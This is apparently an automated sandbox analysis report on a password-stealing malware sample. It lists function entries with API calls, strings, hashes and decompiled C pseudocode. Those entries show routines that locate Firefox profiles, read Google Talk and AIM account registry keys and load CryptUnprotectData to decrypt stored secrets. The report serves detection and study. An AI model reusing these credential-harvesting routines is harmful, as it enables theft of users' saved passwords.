                                          • Instruction Fuzzy Hash: 23213671C04298B9EB10DBB9EC057CEBF789B04308F0484BAD644A7191C7B98B88C7A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040FC4F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040FC6B
                                          • memset.MSVCRT ref: 0040FC82
                                            • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                            • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                          • _mbscat.MSVCRT ref: 0040FCAD
                                            • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                            • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                            • Part of subcall function 0041223F: _mbscpy.MSVCRT ref: 0041230C
                                          • _mbscat.MSVCRT ref: 0040FCD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                          • API String ID: 3071782539-1174173950
                                          • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                          • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                          • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                          • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041212C, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • RegCloseKey.KERNELBASE(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                          • _mbscat.MSVCRT ref: 00412188
                                            • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                          Strings
                                          • ProgramFilesDir, xrefs: 00412150
                                          • :\Program Files, xrefs: 0041217E
                                          • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                          • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                          • API String ID: 3464146404-1099425022
                                          • Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                          • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
                                          • Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                          • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004085B9, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E004085B9(void* __ecx, void* __eflags, int _a4) {
				char _v8;
				long _v4112;
				void* __esi;
				intOrPtr* _t42;
				intOrPtr* _t43;
				char* _t46;
				int _t52;
				void* _t54;
				void* _t73;
				intOrPtr _t75;
				int _t78;
				struct HINSTANCE__** _t79;
				void* _t81;

				0x414060();
				_t73 = __ecx;
				E0040733E(__ecx + 4);
				_t78 = _a4;
				if(_t78 == 0) {
					L3:
					E0040821A(_t85, _t73); // executed
					_t79 = _t73 + 0x78;
					E00404D18(_t79);
					_t42 =  *((intOrPtr*)(_t79 + 4));
					if(_t42 == 0) {
						_t43 = 0;
						__eflags = 0;
					} else {
						_t43 =  *_t42( &_v8, 0, 0, 1, 0xf0000000); // executed
					}
					if(_t43 == 0) {
						L14:
						return _t43;
					} else {
						_a4 = 0;
						if( *((intOrPtr*)(_t73 + 0x20)) <= 0) {
							L12:
							_t75 = _v8;
							E00404D18(_t79);
							_t43 =  *((intOrPtr*)(_t79 + 8));
							if(_t43 != 0) {
								_t43 =  *_t43(_t75, 0);
							}
							goto L14;
						} else {
							goto L8;
						}
						do {
							L8:
							_t46 = E00407455(_a4, _t73 + 4);
							_v4112 = 0;
							MultiByteToWideChar(0, 0, _t46, 0xffffffff,  &_v4112, 0x800);
							0x413df8( &_v4112);
							E00408490(_t73, _v8,  &_v4112); // executed
							_t52 = wcslen( &_v4112);
							if(_t52 > 0) {
								_t54 = _t52 + _t52;
								if( *((short*)(_t81 + _t54 - 0x100e)) != 0x2f) {
									 *((short*)(_t81 + _t54 - 0x100c)) = 0x2f;
									 *((short*)(_t81 + _t54 - 0x100a)) = 0;
									E00408490(_t73, _v8,  &_v4112);
								}
							}
							_a4 = _a4 + 1;
						} while (_a4 <  *((intOrPtr*)(_t73 + 0x20)));
						goto L12;
					}
				}
				_a4 = 0;
				if( *((intOrPtr*)(_t78 + 0x1c)) <= 0) {
					goto L3;
				} else {
					goto L2;
				}
				do {
					L2:
					E00407407(_t73 + 4, E00407455(_a4, _t78));
					_a4 = _a4 + 1;
					_t85 = _a4 -  *((intOrPtr*)(_t78 + 0x1c));
				} while (_a4 <  *((intOrPtr*)(_t78 + 0x1c)));
				goto L3;
			}
















                                          0x004085c1
                                          0x004085c9
                                          0x004085ce
                                          0x004085d3
                                          0x004085da
                                          0x00408602
                                          0x00408603
                                          0x00408608
                                          0x0040860b
                                          0x00408610
                                          0x00408615
                                          0x00408628
                                          0x00408628
                                          0x00408617
                                          0x00408624
                                          0x00408624
                                          0x0040862c
                                          0x004086e6
                                          0x004086ea
                                          0x00408632
                                          0x00408635
                                          0x00408638
                                          0x004086d3
                                          0x004086d3
                                          0x004086d6
                                          0x004086db
                                          0x004086e0
                                          0x004086e4
                                          0x004086e4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040863e
                                          0x0040863e
                                          0x00408644
                                          0x0040865a
                                          0x00408661
                                          0x0040866e
                                          0x0040867f
                                          0x0040868b
                                          0x00408693
                                          0x00408695
                                          0x004086a0
                                          0x004086a2
                                          0x004086ac
                                          0x004086bf
                                          0x004086bf
                                          0x004086a0
                                          0x004086c4
                                          0x004086ca
                                          0x00000000
                                          0x0040863e
                                          0x0040862c
                                          0x004085df
                                          0x004085e2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004085e4
                                          0x004085e4
                                          0x004085f2
                                          0x004085f7
                                          0x004085fd
                                          0x004085fd
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                            • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
                                          • _wcslwr.MSVCRT ref: 0040866E
                                          • wcslen.MSVCRT ref: 0040868B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$ByteCharMultiWide_wcslwrwcslen
                                          • String ID: /$/
                                          • API String ID: 2365529402-2523464752
                                          • Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                          • Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
                                          • Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                          • Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407F7E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00407F7E(signed int _a4) {
				void* _v12;
				int _v16;
				void* _v20;
				void _v279;
				char _v280;
				void _v4375;
				int _v4376;
				long _t26;
				char* _t29;
				int _t31;
				void* _t39;
				void* _t44;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;

				0x414060();
				E00407C79(_a4); // executed
				_t26 =  &_v12;
				0x411d68(0x80000001, "Software\Google\Google Talk\Accounts", _t26, _t44, _t39);
				_t49 = _t48 + 0xc;
				if(_t26 == 0) {
					_v16 = 0;
					_v280 = 0;
					memset( &_v279, 0, 0xff);
					_t50 = _t49 + 0xc;
					_t29 =  &_v280;
					0x411dee(_v12, 0, _t29);
					while(1) {
						_t51 = _t50 + 0xc;
						if(_t29 != 0) {
							break;
						}
						_t31 =  &_v280;
						0x411d68(_v12, _t31,  &_v20);
						_t50 = _t51 + 0xc;
						if(_t31 == 0) {
							_v4376 = _t31;
							memset( &_v4375, _t31, 0xfff);
							_t50 = _t50 + 0xc;
							0x411d82(_v20, 0x418304);
							E00407E33(_a4,  &_v280,  &_v4376);
							RegCloseKey(_v20);
						}
						_v16 = _v16 + 1;
						_t29 =  &_v280;
						0x411dee(_v12, _v16, _t29);
					}
					_t26 = RegCloseKey(_v12);
				}
				return _t26;
			}



















                                          0x00407f86
                                          0x00407f90
                                          0x00407f95
                                          0x00407fa3
                                          0x00407fa8
                                          0x00407fad
                                          0x00407fc2
                                          0x00407fc5
                                          0x00407fcc
                                          0x00407fd1
                                          0x00407fd4
                                          0x00407fdf
                                          0x00408067
                                          0x00408067
                                          0x0040806c
                                          0x00000000
                                          0x00000000
                                          0x00407ff0
                                          0x00407ffa
                                          0x00407fff
                                          0x00408004
                                          0x0040800c
                                          0x00408019
                                          0x0040801e
                                          0x00408034
                                          0x00408048
                                          0x00408050
                                          0x00408050
                                          0x00408052
                                          0x00408055
                                          0x00408062
                                          0x00408062
                                          0x00408075
                                          0x00408075
                                          0x0040807a

                                          APIs
                                            • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
                                            • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
                                            • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
                                            • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
                                            • Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                            • Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                            • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                            • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                            • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
                                            • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
                                            • Part of subcall function 00407C79: memcpy.MSVCRT ref: 00407DB2
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00407FCC
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • memset.MSVCRT ref: 00408019
                                          • RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075
                                          Strings
                                          • Software\Google\Google Talk\Accounts, xrefs: 00407F99
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                          • String ID: Software\Google\Google Talk\Accounts
                                          • API String ID: 2959138223-1079885057
                                          • Opcode ID: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
                                          • Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
                                          • Opcode Fuzzy Hash: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
                                          • Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C427, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E0040C427(void* __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				struct HICON__* _t23;
				intOrPtr* _t30;
				void* _t32;
				intOrPtr* _t35;

				_t30 = __ebx;
				 *((intOrPtr*)(__ebx + 0x140)) = 0;
				 *__ebx = 0x418778;
				 *((intOrPtr*)(__ebx + 0x388)) = 0;
				 *((intOrPtr*)(__ebx + 0x394)) = 0;
				0x413d5c(0x738);
				if(__eax == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E0040D339(__eax);
					 *0x41e15c = _t19;
				}
				 *((intOrPtr*)(_t30 + 0x38c)) = _t19;
				0x413d5c(); // executed
				_t35 = _t19;
				_t40 = _t35;
				_t32 = 0x8fc;
				if(_t35 == 0) {
					_t35 = 0;
					__eflags = 0;
				} else {
					E004092CC(_t35, _t40);
					_t5 = _t35 + 0x1cc; // 0x1cc
					_t6 = _t5 + 8; // 0x1d4
					 *_t35 = 0x417eb8;
					E0040D339(_t6);
					 *_t5 = 0x417f40;
					 *(_t35 + 0x1c8) =  *(_t35 + 0x1c8) | 0xffffffff;
				}
				 *((intOrPtr*)(_t30 + 0x390)) = _t35;
				_t20 =  *(_t30 + 0x388);
				if(_t20 != 0) {
					DeleteObject(_t20);
					 *(_t30 + 0x388) = 0;
				}
				_t21 = E00406AE0(); // executed
				 *(_t30 + 0x388) = _t21;
				E00401000(_t32, _t30 + 0x285, 0x418678);
				 *((intOrPtr*)(_t30 + 0x174)) = 0;
				 *((intOrPtr*)(_t30 + 0x17c)) = 0;
				 *((intOrPtr*)(_t30 + 0x178)) = 0;
				 *((intOrPtr*)(_t30 + 0x170)) = 0;
				_t23 = LoadIconA( *0x41dbd4, 0x65); // executed
				E00402C8F(_t30, _t23);
				return _t30;
			}












                                          0x0040c427
                                          0x0040c42c
                                          0x0040c432
                                          0x0040c438
                                          0x0040c443
                                          0x0040c449
                                          0x0040c451
                                          0x0040c45f
                                          0x0040c45f
                                          0x0040c453
                                          0x0040c453
                                          0x0040c458
                                          0x0040c458
                                          0x0040c466
                                          0x0040c46c
                                          0x0040c471
                                          0x0040c473
                                          0x0040c475
                                          0x0040c476
                                          0x0040c4a0
                                          0x0040c4a0
                                          0x0040c478
                                          0x0040c478
                                          0x0040c47d
                                          0x0040c483
                                          0x0040c486
                                          0x0040c48c
                                          0x0040c491
                                          0x0040c497
                                          0x0040c497
                                          0x0040c4a2
                                          0x0040c4a8
                                          0x0040c4b0
                                          0x0040c4b3
                                          0x0040c4b9
                                          0x0040c4b9
                                          0x0040c4bf
                                          0x0040c4cf
                                          0x0040c4d5
                                          0x0040c4e2
                                          0x0040c4e8
                                          0x0040c4ee
                                          0x0040c4f4
                                          0x0040c4fa
                                          0x0040c503
                                          0x0040c50d

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$DeleteIconLoadObject
                                          • String ID: ;@
                                          • API String ID: 1986663749-2925476404
                                          • Opcode ID: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
                                          • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
                                          • Opcode Fuzzy Hash: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
                                          • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041223F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                            • Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                          • memset.MSVCRT ref: 00412297
                                          • RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                          • _mbscpy.MSVCRT ref: 0041230C
                                            • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 889583718-2036018995
                                          • Opcode ID: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                          • Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
                                          • Opcode Fuzzy Hash: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                          • Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404C9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404C9D(struct HINSTANCE__** __eax, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__** _t11;

				_t11 = __eax;
				E00404CE0(__eax);
				_t7 = LoadLibraryA("crypt32.dll"); // executed
				 *_t11 = _t7;
				if(_t7 != 0) {
					_t10 = GetProcAddress(_t7, "CryptUnprotectData");
					_t11[2] = _t10;
					if(_t10 != 0) {
						_t11[1] = 1;
					}
				}
				if(_t11[1] == 0) {
					E00404CE0(_t11);
				}
				return _t11[1];
			}







                                          0x00404c9e
                                          0x00404ca0
                                          0x00404caa
                                          0x00404cb2
                                          0x00404cb4
                                          0x00404cbc
                                          0x00404cc4
                                          0x00404cc7
                                          0x00404cc9
                                          0x00404cc9
                                          0x00404cc7
                                          0x00404cd4
                                          0x00404cd6
                                          0x00404cd6
                                          0x00404cdf

                                          APIs
                                            • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                          • LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                          • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: CryptUnprotectData$crypt32.dll
                                          • API String ID: 145871493-1827663648
                                          • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                          • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                          • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                          • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411560, Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004115A1
                                          • K32EnumProcesses.KERNEL32(?,00004000,004044A3,?,004044A3,?,00000000,00000000,00000000), ref: 004115B9
                                            • Part of subcall function 004112D9: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                            • Part of subcall function 004112D9: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                            • Part of subcall function 004112D9: K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                            • Part of subcall function 004112D9: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                            • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                            • Part of subcall function 0041172B: memcpy.MSVCRT ref: 00411758
                                          • _mbscpy.MSVCRT ref: 0041165E
                                          • CloseHandle.KERNEL32(00000000,004044A3,?), ref: 00411697
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseEnumProcess_mbscpy$ChangeFileFindHandleModuleModulesNameNotificationOpenProcessesmemcpymemset
                                          • String ID:
                                          • API String ID: 3551507631-0
                                          • Opcode ID: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                          • Instruction ID: 5e40a2ef1ff72a785ccc601064cd9551f1045985186162b7752f8c4c90acf24d
                                          • Opcode Fuzzy Hash: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                          • Instruction Fuzzy Hash: 72317271901129ABDB20EB65DC85BEE77BCEB44344F0440ABE709E2160D7759EC5CA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411C8F, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00411CB8
                                            • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                            • Part of subcall function 00406F2D: memcpy.MSVCRT ref: 00406F78
                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                          • memset.MSVCRT ref: 00411CF4
                                          • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                          • String ID:
                                          • API String ID: 3143880245-0
                                          • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                          • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                          • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                          • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404220, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E00404220(void* __eflags, intOrPtr _a4, void* _a8) {
				signed int _v8;
				void* __ecx;
				void* __esi;
				void* _t17;
				void* _t18;
				void* _t19;
				signed int _t20;
				void* _t24;
				void* _t27;
				long _t31;
				void* _t34;

				_v8 = _v8 & 0x00000000;
				_t34 = E004067BA(_a8);
				_a8 = _t34;
				if(_t34 != 0xffffffff) {
					_t31 = GetFileSize(_t34, 0);
					_t5 = _t31 - 0x11; // -17
					if(_t5 <= 0xfffee) {
						_t6 = _t31 + 1; // 0x1
						_t17 = _t6;
						0x413d5c(); // executed
						_t27 = _t17;
						_t24 = _t17;
						_t18 = E00406ED6(_t27, 0, _t34, _t24, _t31); // executed
						if(_t18 != 0) {
							_t19 = E00406B3B();
							_t43 = _t19;
							if(_t19 == 0) {
								_push(_t31);
								_push(_t24);
							} else {
								_push(_t31 + 0xfffffff4);
								_t7 = _t24 + 0xc; // 0xc
							}
							_push(_a4);
							_t20 = E004049E6(_t43); // executed
							_v8 = _t20;
						}
						0x413d56(_t24);
					}
					CloseHandle(_a8);
				}
				return _v8;
			}














                                          0x00404224
                                          0x00404233
                                          0x00404239
                                          0x0040423c
                                          0x00404247
                                          0x00404249
                                          0x00404251
                                          0x00404253
                                          0x00404253
                                          0x00404257
                                          0x0040425c
                                          0x0040425d
                                          0x00404264
                                          0x0040426e
                                          0x00404270
                                          0x00404275
                                          0x00404277
                                          0x00404283
                                          0x00404284
                                          0x00404279
                                          0x0040427c
                                          0x0040427d
                                          0x00404280
                                          0x00404285
                                          0x00404288
                                          0x0040428d
                                          0x0040428d
                                          0x00404291
                                          0x00404296
                                          0x0040429a
                                          0x0040429a
                                          0x004042a7

                                          APIs
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00404241
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00404257
                                            • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404291
                                          • CloseHandle.KERNEL32(?), ref: 0040429A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 1968906679-0
                                          • Opcode ID: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
                                          • Instruction ID: a1f592bc07a1c6bae19e5ae82b96cf667b255c71c14e9b40cb31a6e8a4c88875
                                          • Opcode Fuzzy Hash: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
                                          • Instruction Fuzzy Hash: F801A1B2501118BBD710AA65EC45EDF776CEB853B4F10823EFD15E62D0EB389E0086A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004112D9, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                          • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                          • K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Process$ChangeCloseEnumFileFindModuleModulesNameNotificationOpen
                                          • String ID:
                                          • API String ID: 1149579341-0
                                          • Opcode ID: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                          • Instruction ID: d3b8bc427d879abbe067d139e4d8751d61c0b56586969d320d8ec49f77c75a5b
                                          • Opcode Fuzzy Hash: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                          • Instruction Fuzzy Hash: 0A01DF36200109BFFB105FA29D84AEBBBACEB44784B04003AFF12D05A0D779DC81822D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004140F2, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                          • Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
                                          • Opcode Fuzzy Hash: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                          • Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004086ED, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
